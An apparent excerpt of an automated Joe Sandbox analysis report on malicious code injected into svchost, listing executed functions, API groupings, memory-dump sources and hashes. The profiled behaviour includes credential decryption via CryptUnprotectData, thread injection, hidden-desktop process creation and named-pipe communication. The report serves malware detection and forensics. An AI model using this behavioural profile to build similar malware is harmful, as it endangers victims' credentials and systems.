                                                                                                                                                                                          execution_graph 418 2435d421cf4 420 2435d421d19 418->420 419 2435d421fa1 420->419 427 2435d4215c0 420->427 422 2435d421f98 CloseHandle 422->419 423 2435d421f88 NtAcceptConnectPort 423->422 424 2435d421e3a 424->422 424->423 430 2435d421aa4 424->430 426 2435d421f76 426->423 429 2435d4215f4 NtAcceptConnectPort 427->429 429->424 431 2435d421aef 430->431 433 2435d421b10 431->433 434 2435d421870 431->434 433->426 435 2435d421889 434->435 436 2435d421930 GetProcessMitigationPolicy 435->436 437 2435d421949 435->437 436->437 437->433 438 2435d4219b4 439 2435d4219c7 438->439 440 2435d4219e6 VirtualFree 439->440 441 2435d4219fb 439->441 440->441

                                                                                                                                                                                          Callgraph

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 00007DF44158E910 Relevance: 18.1, APIs: 6, Strings: 4, Instructions: 563nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPort$DuplicateHandlecallocfree
                                                                                                                                                                                          • String ID: ,$,$H$H
                                                                                                                                                                                          • API String ID: 2459737528-3578512806
                                                                                                                                                                                          • Opcode ID: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                                                                                          • Instruction ID: d3d90c509fed627b9144a38268af5a2d71ad63ef22f50f0f57392a87363585f1
                                                                                                                                                                                          • Opcode Fuzzy Hash: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                                                                                          • Instruction Fuzzy Hash: E302953061CF848BE765EF18D8856AAB3F1FBD8301F10093ED19ED3291DA74E9458B82
                                                                                                                                                                                          Function 00007DF44158F180 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 156nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPathPort$NameName_freemalloc
                                                                                                                                                                                          • String ID: $0$@
                                                                                                                                                                                          • API String ID: 3298263305-2347541974
                                                                                                                                                                                          • Opcode ID: 41dfd5aa33c42447b157757b265737d871a333bd75be70a4a10737d4b23bee9e
                                                                                                                                                                                          • Instruction ID: 666d52cd282554e1bd904a1dffe97da0663df156947528144928d7e74283dfa0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 41dfd5aa33c42447b157757b265737d871a333bd75be70a4a10737d4b23bee9e
                                                                                                                                                                                          • Instruction Fuzzy Hash: F1517034528B888FE765EF1498857AA77E0FB89300F10492FE49FD2251DBB4E4858B83
                                                                                                                                                                                          Function 00007DF44158F32C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 158nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPortfree
                                                                                                                                                                                          • String ID: $0$@
                                                                                                                                                                                          • API String ID: 2184535508-2347541974
                                                                                                                                                                                          • Opcode ID: 3f154c0dcd698207b74ecbf3349ee8280ba9b90b83e006a876e2d17fed3398f1
                                                                                                                                                                                          • Instruction ID: de1ee0ae74e20769be7fc672e7b0a5fe1b76bfe99b532c9cec5783d877a824cf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f154c0dcd698207b74ecbf3349ee8280ba9b90b83e006a876e2d17fed3398f1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 43512B3060CB898FE765EF68D454BABB7E5FBD8345F10492FA48EC2260DBB4D4458B42
                                                                                                                                                                                          Function 00007DF441580B80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFind$DirectoryFirstNextRemove
                                                                                                                                                                                          • String ID: \
                                                                                                                                                                                          • API String ID: 2722548352-2967466578
                                                                                                                                                                                          • Opcode ID: aa0ec3aa504d6ef0e5320522a7ffa5ee1f0828fe674872a74d1c1d53faa5203f
                                                                                                                                                                                          • Instruction ID: b66c5c1a7de9f08c5ed99e2e01b3b80858caecd371aa445609528ee54dbba729
                                                                                                                                                                                          • Opcode Fuzzy Hash: aa0ec3aa504d6ef0e5320522a7ffa5ee1f0828fe674872a74d1c1d53faa5203f
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2418231608E888FEB46EF28DCC89DA77B5FB94701F140A66D40BDB165DF78A854CB90
                                                                                                                                                                                          Function 00007DF4415808CC Relevance: 6.2, APIs: 4, Instructions: 232processCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$Create$CodeDesktopExitTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3114477661-0
                                                                                                                                                                                          • Opcode ID: d9c65f78b88761f55749ee4c73d5915ec55cc6603792b3611b226317cd9e6f4d
                                                                                                                                                                                          • Instruction ID: 70298b4640c58c6ca42ea7e9496bc7b3ad14284027fdeb70fe591d85b29937f0
                                                                                                                                                                                          • Opcode Fuzzy Hash: d9c65f78b88761f55749ee4c73d5915ec55cc6603792b3611b226317cd9e6f4d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F71503051CB888FF7A4EF28D8597ABB7E5FB94311F000A2ED49AD31A1DF7894418B42
                                                                                                                                                                                          Function 00007DF4415859B0 Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2502124517-0
                                                                                                                                                                                          • Opcode ID: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                                                                                          • Instruction ID: 8197fb0782eefa9caeefb10b947704dd78f63fc0106f9c74763f775e4e97ae1f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                                                                                          • Instruction Fuzzy Hash: FC319330618A488FE795EF28D8D879AB7E5FB94311F104A2BD45BC21E0DF78D945CB81
                                                                                                                                                                                          Function 00007DF44156286C Relevance: 3.3, APIs: 2, Instructions: 293threadinjectionCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandleSuspendThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1038686644-0
                                                                                                                                                                                          • Opcode ID: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                                                                                          • Instruction ID: b40e289dc75ba573edef3070881d4a4ecd6fadaf2e1fb90825f96af60cc539da
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F91F930A0CA554BEB6AAB18E8411BA73E1FFD4350F14416ED09FD7595CAF8E882CBC1
                                                                                                                                                                                          Function 000002435D421CF4 Relevance: 3.3, APIs: 2, Instructions: 278nativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000002.2781939497.000002435D420000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002435D420000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_2435d420000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptCloseConnectHandlePort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3811980168-0
                                                                                                                                                                                          • Opcode ID: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                          • Instruction ID: 73bfe0a8882c0378bbf4cb7287223e9c30025e9bb31031679be0bc6dfc001342
                                                                                                                                                                                          • Opcode Fuzzy Hash: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3791E970508E088FD764EF1CC4857E973E1FB98310F64865ED49BC7696EF34A9828B81
                                                                                                                                                                                          Function 00007DF44159D42C Relevance: 1.8, APIs: 1, Instructions: 552COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                          • Opcode ID: 0cba3b52d22fc22b11fda789372843ae04e2053c3aa275865dfb441ab6df4247
                                                                                                                                                                                          • Instruction ID: cf58709723ffbbf488d8edc97ddb6960829d365c43a80361ddc56d6788c99c57
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cba3b52d22fc22b11fda789372843ae04e2053c3aa275865dfb441ab6df4247
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E025E3161CA489BEB65FB28D845ADBB3E1FBD4300F40452AE45FD31A1DE74E945CB82
                                                                                                                                                                                          Function 00007DF441562514 Relevance: 1.7, APIs: 1, Instructions: 222COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                                                                          • Opcode ID: 4604594dd80deaa7dc65681505de0cd38ecb63ec40db0f49576e2dc26c5e6384
                                                                                                                                                                                          • Instruction ID: 24a15be53d12b4bb04d6a6805785e8bdd7a195dfc56b6b00a4249f26445ea819
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4604594dd80deaa7dc65681505de0cd38ecb63ec40db0f49576e2dc26c5e6384
                                                                                                                                                                                          • Instruction Fuzzy Hash: C251B43061CE4D4FFB56BA68A4583A673E1FBA8380F10013AE45FD71A4DEB8D88187C1
                                                                                                                                                                                          Function 00007DF4415860F0 Relevance: 1.6, APIs: 1, Instructions: 114encryptionCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CryptDataUnprotect
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 834300711-0
                                                                                                                                                                                          • Opcode ID: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                                                                                          • Instruction ID: b132d75f9cf98cdc51ef3d47a9a3fcdc7d65acac6804de754ea62c997483561d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2831633071CA489FE744EB58D85966BB7E1FBD9341F40492EE44EC3262DE78D8418792
                                                                                                                                                                                          Function 000002435D4215C0 Relevance: 1.6, APIs: 1, Instructions: 76nativeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,000002435D421E3A), ref: 000002435D421654
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000002.2781939497.000002435D420000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002435D420000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_2435d420000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                          • Opcode ID: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                                                          • Instruction ID: 6af33007687beb81e31e35d0e6fb9f742cc937035e36e655c46445ec10788f52
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                                                          • Instruction Fuzzy Hash: 612160B1508B088FDB58DF18C4C9A6EB7E1FBA8305F584A6EE44AC7360DB31D585CB41
                                                                                                                                                                                          Function 00007DF44158E094 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                          • Opcode ID: 04777103404d42a3d8809544d07e3f94752c09d4e382fb2d5f2ce09ccce6d52b
                                                                                                                                                                                          • Instruction ID: b09f3c579a042b5369db4de58c22809a0e49f61b14886359a25428569fd41518
                                                                                                                                                                                          • Opcode Fuzzy Hash: 04777103404d42a3d8809544d07e3f94752c09d4e382fb2d5f2ce09ccce6d52b
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F0B234A1CBC49FD7A1EB288484B9ABBF0FB9A340F54491EE8CCC3211D73594848B03
                                                                                                                                                                                          Function 00007DF44158E25C Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                          • Opcode ID: 4cf3975fe2f826ffe67f273e2a1973cf5c2994fe7bf33f6883edfc4130774661
                                                                                                                                                                                          • Instruction ID: b4c3b2393c3523e8c13c3e8134a9aacc64508f90d3babce66a58970c8b7ac845
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cf3975fe2f826ffe67f273e2a1973cf5c2994fe7bf33f6883edfc4130774661
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EF0BD30A1CB848FDB64EB2CD489B9977E1FB98300F504519E84DC3255DA3498808B86
                                                                                                                                                                                          Function 00007DF44158E3E8 Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                          • Opcode ID: 5596204144bf6387c6881bf1fa4f57717ef6e785025276df84d2fa40d30d7839
                                                                                                                                                                                          • Instruction ID: e28240edd5b085b30460244f0ac08b01e1847c4bc8a710475511288aeb28dd83
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5596204144bf6387c6881bf1fa4f57717ef6e785025276df84d2fa40d30d7839
                                                                                                                                                                                          • Instruction Fuzzy Hash: 78E06531618A448FDB05EE98CCC15AAB7F4EBD8300F004D7AE85AC6174D2A4D698C642
                                                                                                                                                                                          Function 00007DF44158E170 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                          • Opcode ID: c0f707815c29bc5e42aa1d0e63f012e02fb8cc729e2b5fa34e6064e28ee2c0b2
                                                                                                                                                                                          • Instruction ID: 69ecda76879f8ad7b141995203c11fbdfb6ca9bd0c95543fc191ceae1411c4e2
                                                                                                                                                                                          • Opcode Fuzzy Hash: c0f707815c29bc5e42aa1d0e63f012e02fb8cc729e2b5fa34e6064e28ee2c0b2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 33D05E30E2CA895BEA10B728884169637F1FBD9304F904A14D44DC3210E27CE4908782
                                                                                                                                                                                          Function 00007DF44158E150 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF44158C0F7), ref: 00007DF44158E160
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                          • Opcode ID: af8779bb09c2e78d507a3ecc3102d682b92eeb4da621b6902aa3ae21c98f3f52
                                                                                                                                                                                          • Instruction ID: 1b8870094381bc695021be0138a518367cbe3bf70ea53f397db5b01cf84884e2
                                                                                                                                                                                          • Opcode Fuzzy Hash: af8779bb09c2e78d507a3ecc3102d682b92eeb4da621b6902aa3ae21c98f3f52
                                                                                                                                                                                          • Instruction Fuzzy Hash: 27C08C20F58D0BAFF94A72AA8C803C621B0EB8E310F800411941AC21A0EAACE4E04392
                                                                                                                                                                                          Function 00007DF44158E3C8 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                          • Opcode ID: 3ea98e83cefaff0a53491c51114555ceb5585970405d7fffab8276f48ff2d2ab
                                                                                                                                                                                          • Instruction ID: cd9802941dc46f3d59b0fa7dca86bf46e1cf11da6d3d0c19ae4dacb42f346647
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ea98e83cefaff0a53491c51114555ceb5585970405d7fffab8276f48ff2d2ab
                                                                                                                                                                                          • Instruction Fuzzy Hash: 00C08000F28C0779F64672694C8065520B0D78C340F800420E41AD1150D89CF8D04391
                                                                                                                                                                                          Function 00007DF441564998 Relevance: 4.9, APIs: 2, Strings: 1, Instructions: 354COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: freemalloc
                                                                                                                                                                                          • String ID: x
                                                                                                                                                                                          • API String ID: 3061335427-2363233923
                                                                                                                                                                                          • Opcode ID: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                                                                                          • Instruction ID: 22660f23444f623a4c32a5a999868dbe21173ddb7a6995adc5f3bdc31b4b3b31
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a23361acd3c5010fa95a7889096e57418eca08b4db551f685a2055cf61445d8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EB19131A1CA845AF72AB618D491AEBB3E1FFD5340F50056EE0DFC2193DD78E606C686
                                                                                                                                                                                          Function 00007DF44158F00C Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: calloc
                                                                                                                                                                                          • String ID: 0$@
                                                                                                                                                                                          • API String ID: 2635317215-1545510068
                                                                                                                                                                                          • Opcode ID: 7c97ea553c2892a25dbf8138126a84db5bc42a7b477b3d27da132530e99906c8
                                                                                                                                                                                          • Instruction ID: 147dd736d29b47b6107aae6114cd2475d755a3fc8f94d0fd104a207610ce0a2b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c97ea553c2892a25dbf8138126a84db5bc42a7b477b3d27da132530e99906c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 16416E30608A498FF755EB58C448BABB7E0FB99345F10052FE84AC32A0EB79D845C792
                                                                                                                                                                                          Function 00007DF441587598 Relevance: 3.9, APIs: 3, Instructions: 139COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: malloc$free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1480856625-0
                                                                                                                                                                                          • Opcode ID: 07a9124dfceae028a3317908ae6002e6db3b01a657e18977bfda4f97c253f38a
                                                                                                                                                                                          • Instruction ID: 6fd5f4e7711854965388748583453b4d28f441e3b592581afc6a59550f527320
                                                                                                                                                                                          • Opcode Fuzzy Hash: 07a9124dfceae028a3317908ae6002e6db3b01a657e18977bfda4f97c253f38a
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2418431608D0E9FEB84FF2DD888AA577F0FBA8315711466BD41AC3661DB74E8908BC0
                                                                                                                                                                                          Function 000002435D5333B0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 350memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2393323556.000002435D530000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002435D530000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_2435d530000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                          • String ID: x
                                                                                                                                                                                          • API String ID: 3298025750-2363233923
                                                                                                                                                                                          • Opcode ID: 66731f1b482563bc89d9877d94cc40398e3a5f4cddffed67c8b36e4cd925d657
                                                                                                                                                                                          • Instruction ID: 48dfe9037b79b7e5cc44c8b0369bbd4670cf5852fae22146d78ec2e36da597b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 66731f1b482563bc89d9877d94cc40398e3a5f4cddffed67c8b36e4cd925d657
                                                                                                                                                                                          • Instruction Fuzzy Hash: 34B10931518A580BE72DEF2CC8896BA77D1FB89304F50496EE5D7C3583EE34DB468A81
                                                                                                                                                                                          Function 00007DF44157A0AC Relevance: 3.4, APIs: 2, Instructions: 397COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000012.00000003.2781153513.00007DF441561000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF441561000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_18_3_7df441561000_svchost.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile$AcceptConnectMappingPortcalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2835849967-0
